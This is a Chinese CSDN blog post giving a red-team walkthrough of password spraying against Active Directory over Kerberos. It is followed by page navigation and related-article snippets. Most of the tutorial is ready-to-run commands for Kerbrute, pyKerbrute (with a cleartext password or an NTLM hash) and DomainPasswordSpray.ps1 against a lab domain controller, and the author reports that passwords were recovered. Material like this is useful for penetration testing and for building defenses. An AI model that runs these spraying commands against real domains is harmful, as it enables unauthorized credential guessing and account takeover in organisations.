域内密码喷洒

已于 2023-08-31 14:35:23 修改
阅读量355 收藏
点赞数
分类专栏: red 内网 文章标签: windows web安全
于 2023-08-31 14:34:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/132602588
版权
内网 同时被 2 个专栏收录
13 篇文章 1 订阅
订阅专栏
red
11 篇文章 0 订阅
订阅专栏

在Kerberos阶段认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户名存在时候,密码正确和错误两种情况下,AS-REP返回包不一样,所以可以利用这一点对域用户名进行密码喷洒攻击

域内密码喷洒工具

Kerbrute

kerbrute_windows_amd64.exe passwordspray --dc 10.211.55.7 -d hdh.com user.txt QWEasd123

在这里插入图片描述
kerbrute_windows_amd64.exe passwordspray --dc 10.211.55.7 -d hdh.com user.txt password
在这里插入图片描述

pyKerbrute

密码喷洒可以使用明文密码或密码hash
python2 ADPwdSpray.py 10.211.55.7 hdh.com user.txt clearpassword P@ss1234 tcp
python2 ADPwdSpray.py 10.211.55.7 hdh.com user.txt clearpassword P@ss1234 udp
python2 ADPwdSpray.py 10.211.55.7 hdh.com user.txt ntlmhash 74520a4ec2626e3638066146a0d5ceae tcp
python2 ADPwdSpray.py 10.211.55.7 hdh.com user.txt ntlmhash 74520a4ec2626e3638066146a0d5ceae udp

DomainPasswordSpray.ps1

PowerShell脚本工具
使用条件:必须在域内机器上执行,因为默认情况下该脚本是利用LDAP从域中导出用户列表,然后去除被锁定的用户,再用指定的密码进行喷洒
Import-Module C:\Users\win7yu\Desktop\枚举\DomainPasswordSpray-master\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password password
在这里插入图片描述

可以看到成功喷洒出密码

试试离线用户密码能不能喷洒,此时qiezi的机器没有上线
在这里插入图片描述
可以看到成功爆破离线用户密码

番茄酱料
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内用户枚举与密码喷洒
qq_18811919的博客
02-26 785
内用户枚举与密码喷洒讲解了4种工具的使用
渗透之密码喷洒攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 1585
在实际渗透中,许多渗透测试人员和攻击者通常都会使用一种被称为 “密码喷洒”(Password Spraying)的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码猜测的一种。这种针对所有用户的自动密码猜测通常是为了避免帐户被锁定,因为针对同一个用户的连续密码猜测会导致帐户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破解的概率,消除帐户被锁定的概率。普通的爆破就是用户名固定,爆破密码,但是密码喷洒,是用固定的密码去跑用户名。
[内网渗透]—外向内信息收集、密码喷洒
Sentiment的博客
12-16 1377
当我们与目标内网建立了socks5隧道后,就可以从外对内机器进行信息搜集了,很多工具不用上传到目标机器,也就不易被AV检测到,但是有可能会被一些流量检测设备发现有大量socks5流量。接下来介绍下如何通过外对内进⾏更深的信息搜集:枚举⽤户、查看内⽤户、查看内组、查看内机器列表…LDAP(轻量⽬录访问协议),是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来
内网安全密码喷洒
最新发布
weixin_45910629的博客
04-06 1001
密码喷洒一般和内用户名枚举一起使用,可以在无内凭据的情况下,通过枚举出内存在的用户名,进而对内存在的用户名进行密码喷洒,以此来获得内有效凭据。在Kerberos协议认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。这种针对所有用户的自动密码猜测通常是为了避免账户被锁定,因为如果目标设置了用户锁定策略的话,针对同一个用户的连续密码猜测会导致账户被锁定。
什么是密码喷洒攻击
weixin_40191861的博客
04-04 358
密码喷洒攻击针对许多不同的账户、服务和组织尝试使用一个或两个通用密码,以此避免在单个账户上被检测或锁定。攻击者使用这种方法避免超过设定的账户锁定阈值,许多组织经常设置为输错三到五次就锁住账户。只要在锁定阈值内输对密码,攻击者可以在整个组织成功尝试多个密码,不会被活动目录中的默认保护机制阻止。攻击者选择最终用户常用的密码和数学公式来猜测密码,或使用已在密码泄露网站上公布的泄露密码。用户在设置密码时要求用户使用特殊字符和字母数字组合,并限制最小长度。使用随机数时,要确保用户无法获取随机数生成算法。
世界卫生组织室内滞留喷洒技术规范.pptx
11-02
《世界卫生组织室内滞留喷洒技术规范》是指导卫生害虫防控的重要文件,主要针对室内病媒害虫,如蚊类、蝇类和蟑螂等,以防止虫媒疾病的传播,例如疟疾、登革热等。该规范强调了综合害虫管理(IPM)的理念,即结合...
基于单片机的智能灌溉喷洒系统的设计
11-17
【标题】"基于单片机的智能灌溉喷洒系统的设计"是关于利用单片机技术构建智能化农业灌溉系统的项目。这种系统旨在提高农田灌溉效率,节约水资源,同时降低人工劳动强度,实现农业生产的自动化。 【描述】这个项目...
渗透完全技巧.pdf
10-03
在没有密码的情况下,可能会使用密码喷洒或ASREP Roasting攻击来获取哈希值。 5. **权限维持**:一旦获取了控权限,攻击者会部署后门,如利用信任关系、SID历史、AdminSDHolder和SDProp、Dcsync后门等。他们还...
自制苗圃自动喷洒控制器
02-03
受当地一家苗圃之托,为其制作一台能自动喷洒的控制器代替人工定时喷洒,要求是开停时间可人工调整进行设定,如喷洒2分钟、停止30分钟,然后再喷洒2分钟、停止30分钟,这样周而复始地工作。自制的控制器电路如...
渗透—用户账号密码爆破
good good study
03-24 4046
在常规的爆破中,我们都是先用很多密码去碰撞一个账号,这样很容易导致账号被锁定。而密码喷洒就是用一个密码去碰撞很多账号,此方法能有效的避免账号被锁定的问题获取了用户后,进行密码喷洒。首先可以查询密码策略(net accounts /domain),根据密码策略再构造爆破字典。
内用户枚举和密码喷洒攻击(Password Spraying)
谢公子的博客
04-28 4119
目录 内用户枚举 密码喷洒攻击 在 Kerberos 协议认证的 AS-REQ阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对内进行用户枚举和密码喷洒攻击 内用户枚举 当主机不在内时,我们可以通过内用户枚举来探测内的用户。我们可以使用nmap指定脚本来探测。 nmap ...
8-内渗透
WX公众号-小白学安全
02-23 770
服务主体名称(Server Principal Name)SPN,是服务实例的唯一标识符。Kerberos身份验证使用SPN将服务实例与服务账户进行关联,在中如果有多个服务,那么每个服务都必须有自己的SPN和用户。一个用户可以有多个SPN,但是一个SPN只能对应一个服务,SPN必须注册在用户下。简述SPN:服务主体名称,将服务用户和服务进行关联服务用户:用于登录运行服务的用户服务:运行在计算机上的服务命令格式两个必须元素:serviceclass为服务类,host为服务所在的主机名字。
渗透-用户枚举和密码喷洒
weixin_43227251的博客
05-06 1106
渗透-用户枚举和密码喷洒 在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对内进行用户枚举和密码喷洒攻击 内用户枚举 当主机不在内时,我们可以通过内用户枚举来探测内的用户。 我们可以使用Kerbrute工具进行探测。 工具地址:https://github.com/ropnop/kerbrute kerbrute_windows_amd64.exe
内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和内用户枚举横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-17 555
正常用户登录主机,我们可以通过 "net user /domain"来列举出内的用户。但是当我们用非用户进行登录时,是不能使用 "net user /domain"这条命令的。或者当主机不在内但是能与控通信时,以上两种情况我们可以通过以下方法对内用户进行枚举。
如何通过审计安全事件日志检测密码喷洒(Password Spraying)攻击
weixin_33726313的博客
05-28 453
许多渗透测试人员和攻击者通常都会使用一种被称为“密码喷洒(Password Spraying)”的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码猜测的一种。这种针对所有用户的自动密码猜测通常是为了避免帐户被锁定,因为针对同一个用户的连续密码猜测会导致帐户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破...
用户爆破(DomainPasswordSpray)
网络安全。
03-03 2292
0x01 介绍 UserList - Optional UserList parameter. This will be generated automatically if not specified. Password - A single password that will be used to perform the password spray. P...
内网渗透_密码喷洒攻击
qq_42383069的博客
03-28 8473
密码喷洒攻击 0x01. 背景 ⼀般我们我们与目标内网建立了 socks5 隧道后,就可以从外(这⾥指的是我们攻击的机器)对内机器进行密码喷洒了,前提是已经通过信息搜集或者抓密码得到了⼀批密码,我们就可以通过得到的密码来对内进行密码喷洒 0x02. 工具与方法 1. CrackMapExec 对内进行密码喷洒 CrackMapExec(⼜名 CME)是⼀款非常好用的密码喷洒攻击的⼯具,在 Kali Linux 默认已经安装好。 1.2. 下载地址:https://github.com/byt3bl3
密码喷洒实现
热门推荐
Shanfenglan's blog
10-27 9万+
密码喷洒 利用一个powershell工具完成DomainPasswordSpray 利用工具:DomainPasswordSpray 命令 下载工具 curl https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1 > C:\Users\Administrator\Desktop\1.ps1 powershell (new-object System.Net.W
红队技巧-渗透的协议利用
Gamma_lab的博客
06-29 2366
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了uac,所以本地只有sid 为500和admi
Arduino喷洒代码
05-13
以下是一个简单的Arduino喷洒代码,可以通过控制电磁阀来实现喷洒: ``` int valvePin = 2; //电磁阀控制引脚 int sprayTime = 1000; // 喷洒时间,单位为毫秒 void setup() { pinMode(valvePin, OUTPUT); // 将电磁阀控制引脚设为输出模式 } void loop() { digitalWrite(valvePin, HIGH); // 打开电磁阀,开始喷洒 delay(sprayTime); // 喷洒一定时间 digitalWrite(valvePin, LOW); // 关闭电磁阀,停止喷洒 delay(5000); // 等待一定时间,准备下一次喷洒 } ``` 请注意,这仅是一个示例代码,您需要根据实际情况进行修改和优化。例如,您可能需要添加传感器来检测植物的状态,以便根据需要调整喷洒时间和频率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值